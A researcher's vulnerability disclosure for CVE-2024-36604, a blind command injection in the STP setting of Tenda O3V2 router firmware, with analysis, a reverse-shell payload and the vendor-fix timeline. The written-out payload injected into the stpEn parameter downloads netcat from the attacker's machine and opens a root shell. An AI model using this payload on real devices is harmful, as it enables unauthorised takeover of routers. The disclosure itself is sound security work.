CVE-2024-36604 - Blind Command Injection in STP Service on Tenda O3V2

May 20, 2024 exzettabyte

This article discusses the second vulnerability I found in the Tenda O3V2 with firmware version 1.0.0.12. The vulnerability I found was blind command injection on the enable/disable STP Service feature. Blind command injection is a vulnerability that allows an attacker to execute operating system commands on the server that is running an application and application does not return the output from the command. Tenda O3V2 have stp service, by default this service is off, when disable this service will carry a value of 0 and if enable the service will carry a value of 1 on the parameter then enter the dosystemcmd function. Due to the lack of validation on these parameter, blind command injection can occur.

Vulnerability Analysis

Open router’s httpd binary with Ghidra. In the setSTP function there is the doSystemCmd function, this function executes the command that will enable/disable the stp service and this function requires user input. It is evident in the stprequest variable there is no sanitization, this variable will later be passed to the doSystemCmd function, potentially leading to command injection, and because the command is only executed and the result of the command is not displayed, this command injection is blind.

SetSTP Function

Listen on port 1337 with nc (netcat), then activate the web server to make the router download the netcat binary (mips). Netcat is used for reverse shell.

Python HTTP Server

Visit 192.168.2.1 and login, then go to Network Service

Network Service

Intercept request using burpsuite when submit. In the setNetworkService endpoint, there is stpEn parameter.

Intercept Request

Change the value of the stpEn parameter to the command we want, for example performing a reverse shell then forward the request

;wget 192.168.2.158:8000/netcat -O /tmp/netcat&&chmod +x /tmp/netcat&&./tmp/netcat 192.168.2.158 1337 -e /bin/sh

Explanation of this command, the router will download the netcat binary stored in the tmp directory, then the binary will be given execute access and then execute the binary to reverse shell to port 1337. Then forward the request.

Reverse Shell

Check the web server, and it’s visible that the router is downloading the netcat file

Download nc MIPS

Check on the listener, the reverse shell is successful. Now, we got full access to the router with root privilege.

Got Root Shell

Mitigation

When this article was published, Tenda had already released new firmware for this device with firmware version 1.0.0.13(5755). In this firmware version, the vulnerability has been fixed by implementing sanitization.

They still haven’t released the new firmware to the public but you can download the latest firmware here

Timeline

20 April 2024: Vulnerability discovered and sent them the details of the vulnerability.
20 April 2024: Vendor triage the vulnerability.
22 April 2024: Vendor release new firmware version 1.0.0.13(5755).
25 April 2024: Retesting on the new firmware version and confirming the vulnerability has been fixed.
4 June 2024: CVE ID assigned